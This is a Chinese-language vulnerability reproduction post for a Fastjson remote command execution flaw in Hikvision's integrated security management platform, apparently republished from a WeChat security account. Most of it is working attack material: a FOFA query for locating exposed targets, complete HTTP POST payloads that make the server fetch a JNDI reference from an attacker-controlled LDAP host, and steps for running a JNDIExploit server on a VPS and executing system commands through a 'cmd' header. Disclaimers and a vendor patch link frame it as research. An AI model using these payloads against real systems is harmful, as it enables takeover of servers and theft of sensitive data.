【漏洞复现】海康威视综合安防管理平台Fastjson远程命令执行漏洞复现

2023年7月25日14:58:45评论514 views字数 2198阅读7分19秒阅读模式

免责声明

月落星沉研究室的技术文章仅供参考，此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等（包括但不限于）进行检测或维护参考，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责。本文所提供的工具仅用于学习，禁止用于其他违法行为！！！

【漏洞复现】海康威视综合安防管理平台Fastjson远程命令执行漏洞复现

海康威视综合安防管理平台存在Fastjson远程命令执行漏洞，攻击者可通过构造恶意Payload执行并获取服务器系统权限以及敏感数据信息。

【漏洞复现】海康威视综合安防管理平台Fastjson远程命令执行漏洞复现

V2.0.0 <= iVMS-8700 <= V2.9.2 V1.0.0 <= iSecure Center <= V1.7.0

【漏洞复现】海康威视综合安防管理平台Fastjson远程命令执行漏洞复现

访问漏洞环境

FOFA: app=“HIKVISION-综合安防管理平台”

【漏洞复现】海康威视综合安防管理平台Fastjson远程命令执行漏洞复现

2.对漏洞进行复现

漏洞数据包如下：

Poc （POST）

POST /bic/ssoService/v1/applyCT HTTP/1.1Host: 127.0.0.1Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: cross-siteSec-Fetch-User: ?1Te: trailersContent-Type: application/jsonContent-Length: 204
{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://kjvqweuoav.dnstunnel.run","autoCommit":true},"hfe4zyyzldp":"="}

首先先测试下ldap执行dnslog能否回显，如果能够收到请求，大概率是存在命令执行漏洞的。

【漏洞复现】海康威视综合安防管理平台Fastjson远程命令执行漏洞复现

确定dnslog能收到请求后，可进一步的利用，使用 JNDIExploit-1.3-SNAPSHOT.jar 工具执行如下命令

工具下载地址: 前往下载

java -jar JNDIExploit-1.3-SNAPSHOT.jar -i VPSip

【漏洞复现】海康威视综合安防管理平台Fastjson远程命令执行漏洞复现

然后在Burp的请求数据包头部加上字段 cmd: whoami 这里cmd可执行系统命令，下方payload中ldap改成你的VPSip/Basic/TomcatEcho，如下数据包：

POST /bic/ssoService/v1/applyCT HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0Accept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Connection: keep-aliveHost: 127.0.0.1Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Dnt: 1Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: cross-siteSec-Fetch-User: ?1Te: trailersContent-Type: application/jsoncmd: whoamiContent-Length: 215{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://公网服务器ip地址:1389/Basic/TomcatEcho","autoCommit":true},"hfe4zyyzldp":"="}

Burp放包并执行【漏洞复现】海康威视综合安防管理平台Fastjson远程命令执行漏洞复现

【漏洞复现】海康威视综合安防管理平台Fastjson远程命令执行漏洞复现

目前厂商已发布升级补丁以修复漏洞，补丁获取链接：

https://www.hikvision.com/en/support/cybersecurity/security-advisory/security-notification-command-injection-vulnerability-in-some-hikvision-products/

本文由月落星沉团队编写，欢迎各位网安工程师加入月落安全研究实验室，一起学习交流讨论！群聊已满的添加Vx：linjialelovejesus，备注进群。（已加入一二三四五六群的无需重复加群）

【漏洞复现】海康威视综合安防管理平台Fastjson远程命令执行漏洞复现

原文始发于微信公众号（月落安全）：【漏洞复现】海康威视综合安防管理平台Fastjson远程命令执行漏洞复现

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

【漏洞复现】海康威视综合安防管理平台Fastjson远程命令执行漏洞复现

对抗性机器学习-攻击和缓解的分类和术语（三）

记一次带学员渗透母校

Nosql注入学习记录

SQL注入漏洞实战

基于K8s日志审计实现攻击行为检测

Dr4g0n b4ll_1

XSS目前Web中的另类利用场景和绕Waf的Payload分享|挖洞技巧

文件上传黑名单限制的绕过总结

metasploit（1）生成远控木马

Ghost

发表评论

在线咨询

微信